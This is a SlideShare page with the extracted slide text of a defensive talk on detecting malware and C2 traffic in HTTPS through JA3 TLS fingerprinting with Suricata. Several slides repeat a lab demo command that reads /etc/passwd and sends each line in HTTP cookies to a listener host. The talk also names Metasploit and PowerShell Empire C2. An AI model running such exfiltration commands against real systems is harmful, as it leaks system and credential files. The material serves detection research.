SlideShare a Scribd company logo

Http ssl ja3 fingerprinting

Download as PPT, PDF
M
MrArora Arjuna

This document discusses using SSL/TLS fingerprinting and the JA3 hash to detect malware and command and control (C2) communications within encrypted HTTPS tunnels. It describes setting up Suricata with SSL/TLS fingerprinting to baseline common browsers and analyze malware samples that use encryption for exfiltration and C2. The document also covers installing and configuring Suricata to perform this analysis on a test network.

Internet
1 of 38
Downloaded 14 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
SSL/TLS fingerprinting
Http ssl ja3 fingerprinting
Http ssl ja3 fingerprinting
Format Suricata support ja3_hash /ja3_string
Http ssl ja3 fingerprinting
Client Hello Fingerprint
Client/Server Communication SSL
Http ssl ja3 fingerprinting
Client ssl hello fingerprinting
Ja3 Client Hello Fingerprinting
https://engineering.salesforce.com/open-sourcing-ja3-92c9e53c3c41
Research by .....
chrome Browser
IE Browser
Firefox Browser
• SSL/TLS fingerprinting detection with Suricata • -Baseline HTTPs browser client ssl fingerprinting fingerprinting Mozilla,IE,Chrome Baseline different malware/c2 inside ssl tunnell Stunnell (behavior Malware/C2 analysis) -backcookies--> Constant timing + Data Exflitration Cookies -Covertutils --> Random Beaconing -Other C2 HTTP communication etc .... Metasploit Reverse HTTPS
User Segment Ony Client Internet NIPS -suricata HTTP client Hello fingerprinting Baseline Browser HTTPs fingerprint Mozilla Chrome IE Good Network Behavior Category Web Server Search Engine Free cert Paid cert Self-sign cert ? ?????? Bridge AP wifi
Installation of suricata 4.1.0
Installation of suricata 4.1.0 apt-get -y install libpcre3 libpcre3-dbg libpcre3-dev build-essential autoconf automake libtool libpcap-dev libnet1-dev libyaml-0-2 libyaml-dev zlib1g zlib1g-dev libmagic-dev libcap-ng-dev libjansson-dev pkg-config python-yaml apt-get -y install libnetfilter-queue-dev ./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc -- localstatedir=/var make && make install-full
Baseline Analysis Mozila/Firefox xbits with ip-dst
Baseline Analysis Mozila/Firefox xbits with ip-src
Baseline Analysis Mozila/Firefox xbits with track ip_pair
Baseline Analysis Mozila/Firefox xbits(ip-pair) + flowbits
stunnell ssl client fingerprinting
cat/etc/passwd|whilereadexfil;dopython./badcookie.py192.168.0.110"$exfil";done socatTCP-LISTEN:80,bind=192.168.25.5,fork,reuseaddr,crlfSYSTEM:"echoHTTP/1.0200;echoContent-Type:text/plain;echo;" 192.168.0.110 Suricataips Base64 encoding detected
Data exflitration at cookies cat /etc/passwd | while read exfil; do python ./badcookie.py 192.168.1.149 "$exfil" ; done 192.168.1.149 socat TCP-LISTEN:80,bind=192.168.25.5,fork,reuseaddr,crlf SYSTEM:"echo HTTP/1.0 200; echo Content-Type: text/plain; echo;" socat TCP-LISTEN:80,bind=192.168.25.5,fork,reuseaddr,crlf SYSTEM:"echo HTTP/1.0 200; echo Content-Type: text/plain; echo;" cat /etc/passwd | while read exfil; do python ./badcookie.py 192.168.1.149 "$exfil" ; done
Data exflitration at cookies values
Data exflitration at cookies HTTPS 3 session
encryption a b c
Repeated with same size length 426 563 426 563
HTTP vs HTTP/2
Metasploit Reverse HTTPS
psiphon internet bypass
Drop on purpose
Http ssl ja3 fingerprinting
Powershell Empire C2 HTTPS JA3 + TLS server
Http ssl ja3 fingerprinting
• Presentation by • Arora by protocolunique solution Q & A

More Related Content

PDF
Hacking With Nmap - Scanning Techniques
amiable_indian
 
PDF
Ceh v5 module 02 footprinting
Vi Tính Hoàng Nam
 
PPTX
Network scanning
MD SAQUIB KHAN
 
PPT
Netcat
yogendra singh chahar
 
PDF
HTTP Security Headers
Ismael Goncalves
 
PDF
Nmap scripting engine
n|u - The Open Security Community
 
ODP
Scanning with nmap
commiebstrd
 
PDF
Ceh v5 module 03 scanning
Vi Tính Hoàng Nam
 
Hacking With Nmap - Scanning Techniques
amiable_indian
 
Ceh v5 module 02 footprinting
Vi Tính Hoàng Nam
 
Network scanning
MD SAQUIB KHAN
 
Netcat
yogendra singh chahar
 
HTTP Security Headers
Ismael Goncalves
 
Nmap scripting engine
n|u - The Open Security Community
 
Scanning with nmap
commiebstrd
 
Ceh v5 module 03 scanning
Vi Tính Hoàng Nam
 

What's hot (20)

PPTX
VC4NM73 EQ#4-3DES
luigiHdz
 
PDF
Security Analyst Workshop - 20190314
Florian Roth
 
PPTX
NMAP
PrateekAryan1
 
PDF
Ceh v5 module 04 enumeration
Vi Tính Hoàng Nam
 
PPTX
Recon with Nmap
OWASP Delhi
 
PDF
XSS Magic tricks
GarethHeyes
 
PPT
Port scanning
Hemanth Pasumarthi
 
PPTX
Tcpdump
Sourav Roy
 
PPTX
20 common port numbers and their purposes
salamassh
 
PDF
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
PPT
Blowfish Cryptosystem
هيثم فرج
 
PDF
SSH - Secure Shell
Peter R. Egli
 
PPT
Introduction to PowerShell
Salaudeen Rajack
 
PPTX
Ethical hacking : Its methodologies and tools
chrizjohn896
 
PDF
Threat Modeling to Reduce Software Security Risk
Security Innovation
 
PDF
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
PDF
SSH
Zach Dennis
 
DOCX
Ports and protocols
Kailash Kumar
 
PDF
Nmap tutorial
Varun Kakumani
 
PPT
Snort
Stickman Hai
 
VC4NM73 EQ#4-3DES
luigiHdz
 
Security Analyst Workshop - 20190314
Florian Roth
 
NMAP
PrateekAryan1
 
Ceh v5 module 04 enumeration
Vi Tính Hoàng Nam
 
Recon with Nmap
OWASP Delhi
 
XSS Magic tricks
GarethHeyes
 
Port scanning
Hemanth Pasumarthi
 
Tcpdump
Sourav Roy
 
20 common port numbers and their purposes
salamassh
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
Blowfish Cryptosystem
هيثم فرج
 
SSH - Secure Shell
Peter R. Egli
 
Introduction to PowerShell
Salaudeen Rajack
 
Ethical hacking : Its methodologies and tools
chrizjohn896
 
Threat Modeling to Reduce Software Security Risk
Security Innovation
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
bugcrowd
 
SSH
Zach Dennis
 
Ports and protocols
Kailash Kumar
 
Nmap tutorial
Varun Kakumani
 
Snort
Stickman Hai
 
Ad

Similar to Http ssl ja3 fingerprinting (20)

PPT
e-Xpert Gate / Reverse Proxy - WAF 1ere génération
Sylvain Maret
 
PDF
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE
 
PDF
Case Studies and Lessons Learned from SSL/TLS Certificate Verification Vulner...
JPCERT Coordination Center
 
PDF
SSL Secure socket layer
Ahmed Elnaggar
 
PDF
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
Adel Karimi
 
PDF
Configuring SSL on NGNINX and less tricky servers
Axilis
 
PDF
#Morecrypto (with tis) - version 2.2
Olle E Johansson
 
PPTX
Vpn
Lan & Wan Solutions
 
PDF
Dr. Omar Ali Alibrahim - Ssl talk
promediakw
 
PDF
020618 Why Do we Need HTTPS
Jackio Kwok
 
PDF
Certificate Pinning in Mobile Applications
Luca Bongiorni
 
PPTX
Oralce SSL walelt -TCPS_Troubleshooting_PB.pptx
ssuser865ecd
 
PPT
Certificates and Web of Trust
Yousof Alsatom
 
PPT
Squid server
Rohit Phulsunge
 
PPTX
Flak+technologies
Tatyana Kobets
 
PPTX
Flak+technologies
Tatyana Kobets
 
PPT
Secure Communication with an Insecure Internet Infrastructure
webhostingguy
 
PPTX
[Cluj] Turn SSL ON
OWASP EEE
 
PPTX
Information Security Engineering
Md. Hasan Basri (Angel)
 
PPT
Ch12 Cryptographic Protocols and Public Key Infrastructure
Information Technology
 
e-Xpert Gate / Reverse Proxy - WAF 1ere génération
Sylvain Maret
 
FIWARE Wednesday Webinars - How to Secure IoT Devices
FIWARE
 
Case Studies and Lessons Learned from SSL/TLS Certificate Verification Vulner...
JPCERT Coordination Center
 
SSL Secure socket layer
Ahmed Elnaggar
 
honeyTLS - Profiling and Clustering Internet-wide SSL/TLS Scans with JA3
Adel Karimi
 
Configuring SSL on NGNINX and less tricky servers
Axilis
 
#Morecrypto (with tis) - version 2.2
Olle E Johansson
 
Vpn
Lan & Wan Solutions
 
Dr. Omar Ali Alibrahim - Ssl talk
promediakw
 
020618 Why Do we Need HTTPS
Jackio Kwok
 
Certificate Pinning in Mobile Applications
Luca Bongiorni
 
Oralce SSL walelt -TCPS_Troubleshooting_PB.pptx
ssuser865ecd
 
Certificates and Web of Trust
Yousof Alsatom
 
Squid server
Rohit Phulsunge
 
Flak+technologies
Tatyana Kobets
 
Flak+technologies
Tatyana Kobets
 
Secure Communication with an Insecure Internet Infrastructure
webhostingguy
 
[Cluj] Turn SSL ON
OWASP EEE
 
Information Security Engineering
Md. Hasan Basri (Angel)
 
Ch12 Cryptographic Protocols and Public Key Infrastructure
Information Technology
 
Ad

Recently uploaded (20)

PPTX
Module 1 - Cyber Law and Ethics 101.pptx
anantyakhrisna1
 
PDF
Sims 4 Historia para lo sims 4 para jugar
lolpopy34
 
PDF
Tenda Login Guide: Access Your Router in 5 Easy Steps
tendawifi16
 
PPTX
innovation process that make everything different.pptx
SoumyadipPaul18
 
PDF
WebRTC in SignalWire - troubleshooting media negotiation
Giacomo Vacca
 
PPTX
Introuction about WHO-FIC in ICD-10.pptx
naveenithkrishnan
 
PDF
Unit-1 introduction to cyber security discuss about how to secure a system
shivangisharma636228
 
PPTX
PptxGenJS_Demo_Chart_20250317130215833.pptx
itruongva
 
PDF
Smart Home Technology for Health Monitoring (www.kiu.ac.ug)
publication11
 
PPTX
SAP Ariba Sourcing PPT for learning material
NKKumar16
 
PPT
isotopes_sddsadsaadasdasdasdasdsa1213.ppt
Kenneth James Alamillo
 
PPTX
Mathew Digital SEO Checklist Guidlines 2025
Mathew Digital
 
PPTX
INTERNET------BASICS-------UPDATED PPT PRESENTATION
poonam62133
 
PPTX
artificial intelligence overview of it and more
yafotin445
 
PPTX
Power Point - Lesson 3_2.pptx grad school presentation
JoyPPD
 
PDF
Best Practices for Testing and Debugging Shopify Third-Party API Integrations...
CartCoders
 
PPTX
international classification of diseases ICD-10 review PPT.pptx
naveenithkrishnan
 
PPTX
presentation_pfe-universite-molay-seltan.pptx
yahyamohibme
 
PPTX
522797556-Unit-2-Temperature-measurement-1-1.pptx
msar8888
 
PDF
SASE Traffic Flow - ZTNA Connector-1.pdf
mackwell7777
 
Module 1 - Cyber Law and Ethics 101.pptx
anantyakhrisna1
 
Sims 4 Historia para lo sims 4 para jugar
lolpopy34
 
Tenda Login Guide: Access Your Router in 5 Easy Steps
tendawifi16
 
innovation process that make everything different.pptx
SoumyadipPaul18
 
WebRTC in SignalWire - troubleshooting media negotiation
Giacomo Vacca
 
Introuction about WHO-FIC in ICD-10.pptx
naveenithkrishnan
 
Unit-1 introduction to cyber security discuss about how to secure a system
shivangisharma636228
 
PptxGenJS_Demo_Chart_20250317130215833.pptx
itruongva
 
Smart Home Technology for Health Monitoring (www.kiu.ac.ug)
publication11
 
SAP Ariba Sourcing PPT for learning material
NKKumar16
 
isotopes_sddsadsaadasdasdasdasdsa1213.ppt
Kenneth James Alamillo
 
Mathew Digital SEO Checklist Guidlines 2025
Mathew Digital
 
INTERNET------BASICS-------UPDATED PPT PRESENTATION
poonam62133
 
artificial intelligence overview of it and more
yafotin445
 
Power Point - Lesson 3_2.pptx grad school presentation
JoyPPD
 
Best Practices for Testing and Debugging Shopify Third-Party API Integrations...
CartCoders
 
international classification of diseases ICD-10 review PPT.pptx
naveenithkrishnan
 
presentation_pfe-universite-molay-seltan.pptx
yahyamohibme
 
522797556-Unit-2-Temperature-measurement-1-1.pptx
msar8888
 
SASE Traffic Flow - ZTNA Connector-1.pdf
mackwell7777
 

Http ssl ja3 fingerprinting